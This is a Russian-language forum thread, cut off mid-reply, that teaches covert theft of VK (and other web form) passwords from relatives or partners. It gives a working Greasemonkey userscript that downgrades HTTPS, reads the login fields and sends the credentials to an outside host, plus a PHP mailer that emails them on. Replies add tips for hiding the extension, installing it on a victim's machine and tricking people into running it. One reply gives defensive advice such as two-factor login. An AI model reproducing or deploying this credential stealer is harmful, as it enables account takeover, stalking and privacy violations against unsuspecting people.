Получаем логин пароль от соцсетей, форумов и т.д. без взлома

Часто обращаются с просьбой в помощи получения доступа к страничке брата\сестры\любовницы\жены (нужное подчеркнуть). И выкладывать за это килограммы денег они не хотят, по этому для таких халявщиков придумал простой способ без всяких кейлогеров(палятся антивирусами).

Нам потребуется:

1. Компьютер с установленным на него браузером Firefox.
   
2. Установленное на нем дополнение Greasemonkey
3. Веб хостинг, на котором можно запускать php скрипты (не обязательно)

В Greasemonkey создаем скрипт:

Код:

// ==UserScript==
// @name        WebCriminal getPassVK
// @namespace   vk
// @include     *//vk.com/*
// @version     1
// @require        https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
// @grant       none
// ==/UserScript==

function sendMail(mail, login, pass) {
    $.ajax({
        type: 'GET',
        url: 'http://webcriminal.ru/send_mail.php', //php скрипт куда уходят данные, о нем ниже
        data: {"mail":mail, "login": login, "pass": pass},
        callbackParameter: 'callback',
        dataType: 'jsonp',
        timeout: 10000,
        success: function(json){
            //alert('success')
        },
        error: function(){
            //alert('error')
        }
    });
}
//если https, то редирект на http, иначе пароль не получим.
if(window.location.protocol=="https:"){window.location.href = "http://vk.com";}

$('#quick_login_button').live("click", function() {
    var login = $('input[id*="email"]').val() //выдираем  логин из поля ввода
    var pass = $('input[id*="pass"]').val() //выдираем пароль из поля ввода
    sendMail("ddd@webcriminal.ru", login, pass) //ddd@webcriminal.ru меняем на свое
    return false;
})

Данный скрипт посредством AJAX будет отправлять данные на PHP скрипт send_mail.php:

PHP:

<?
function formatstr($str)
{
    $str = trim($str);
    $str = stripslashes($str);
    $str = htmlspecialchars($str);
    return $str;
}

$from_field = "From: WebCriminal <login_and_pass@webcriminal.ru>";
$subject = "Введенные данные";
$mail = formatstr($_GET["mail"]);
$login = formatstr($_GET["login"]);
$pass = formatstr($_GET["pass"]);
$message .= "Логин: ".$login.";";
$message .= "Пароль: ".$pass.";";
$mail = preg_replace('/%40/', '@', $mail);
mail($mail, $subject, $message, $from_field);
?>

Данный скрипт будет отправлять на ваше мыло полученные данные.

Итого: вы можете переделать выше описанные скрипты под получение данных с любых вебформ, и на последующую их обработку.

P.S. скрипт send_mail.php размещенный на сайте вебкриминала не ведет логи, и еслиб даже и вел, то все равно не понятно с какого ресурса получены данные.

P.S2. способ безпалевный, в последних версиях лисы можно спрятать значок обезьянки, чтоб не смущать подопытного пользователя. А чтобы быстро установить скрипт в Greasemonkey, достаточно сохранить его с расширением js и запустить на компьютере жерты с помощью Firefox.

 

@bat-man, для начала коротко об дополнении, чтоб было понятно что к чему:

Скачивать просто. Открываешь Firefox, жмешь сочетание клавишь Ctrl+Shift+A и в открывшейся вкладке делаешь поиск дополнения(Greasemonkey), после чего устанавливаешь его. Далее нужно создать в нем выше описанный скрипт.
Способ 100% действенный при прямом доступе к компьютеру, но конечно можно и извратиться и впарить все это удаленно. Например убедив жертву в том что с данным аддоном(Greasemonkey) его жизнь станет легче, и для примера пихнешь ему безобидный скрипт, а после того как войдешь в полное доверие дать описанный в этой теме, либо сразу дашь безобидный скрипт с перцовой начинкой. В общем все это творческий процесс :)

 

@Chr()m, если именно от этого, то только используя https, если вас перебрасывает на незащищенный протокол, то стоит задуматься. Но бдительность вас не всегда выручит, если на машине стоит кейлогер и прочий софт, то вас спасет только двухэтапная авторизация или одноразовые пароли, если таковые имеются. Например в контакте это включается в настройках безопасности https://vk.com/settings?act=security если даже ваш пароль скомпрометирован, то под ним не смогут залогинется без доступа к вашему телефону.

Еще заходите только со своих устройств, не давайте свои устройства посторонним людям, правда сниферы все равно не кто не отменял, так что ваши данные на совести сервисов которыми вы пользуетесь. Или на вас, если вы не используете подобные настройки :)

 

Привет, конечно можно, только смысл? Твою почту заспамит смайликами и т.п.
В контакте ведь
любят
общаться
так
:)
а не предложениями как на форумах. В вашем случае нужно чтоб скрипт складировал лог переписки, и через какой-то промежуток времени скидывал его на почту.

 

В настоящее время все способы используют социальную инженерию, нужно как-то заставить жертву пройти на специально сформированную страницу или запустить какой-то софт на компьютере или мобильном устройстве.

 

@russtreeter52, в файле send_mail.php нужно только указать от кого будет ходить почта:

Код:

$from_field = "From: WebCriminal <login_and_pass@webcriminal.ru>";

Вместо login_and_pass@webcriminal.ru можно указать свое или вообще не трогать.

а в tampermonkey в вашем случае нужно поменять 2-е строки: